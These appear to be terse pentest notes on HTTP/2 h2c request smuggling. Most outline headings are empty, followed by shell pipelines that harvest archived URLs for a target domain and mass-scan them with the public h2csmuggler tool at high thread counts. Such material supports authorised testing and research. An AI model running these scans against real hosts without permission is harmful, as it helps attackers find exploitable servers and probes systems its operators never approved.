Request Smuggling Via HTTP/2
----------------------------

1) theory
2) Setup nginx
unlink /etc/nginx/sites-enabled/default
3) setup go server
4) curl command 
5) h2c
6) Demo:


# echo 'target.tld' | waybackurls | anew waybackurls.txt
# echo 'target.tld' | gauplus --random-agent -t 200 -subs | anew waybackurls.txt
# cat waybackurls.txt | urldedupe -m "s,qs,ne" | unfurl -u format %s://%d%p | awk -F "/" '{print $1 "//" $3 "/" $4}' | grep "^https:\/\/" --color=no | sort -u > urls.txt

# python3 $dir/h2csmuggler/h2csmuggler.py --scan-list urls.txt --test --threads 200 2>/dev/null | grep "Success!"|tee h2c-success.txt

Complete Automated
``````````````
printf "\n[*] \e[36mWaybackurl \e[0m is in progress\n"
cat $targets | xargs -P 1000 -I X bash -c "echo 'X' | waybackurls | tee -a waybackurls.txt > /dev/null"
cat $targets | gauplus --random-agent -t 200 -subs | anew -q waybackurls.txt
cat waybackurls.txt | urldedupe -m "s,qs,ne" | unfurl -u format %s://%d%p | awk -F "/" '{print $1 "//" $3 "/" $4}' | grep "^https:\/\/" --color=no | sort -u > urls.txt
printf "\n[!] \e[36mHTTP/2 Smuggeling \e[0m is in progress\n"
python3 $dir/h2csmuggler/h2csmuggler.py --scan-list urls.txt --test --threads 200 2>/dev/null | grep " Success!"|tee h2c-success.txt





_______________________
https://github.com/BishopFox/h2csmuggler






https://bishopfox.com/blog/h2c-smuggling-request
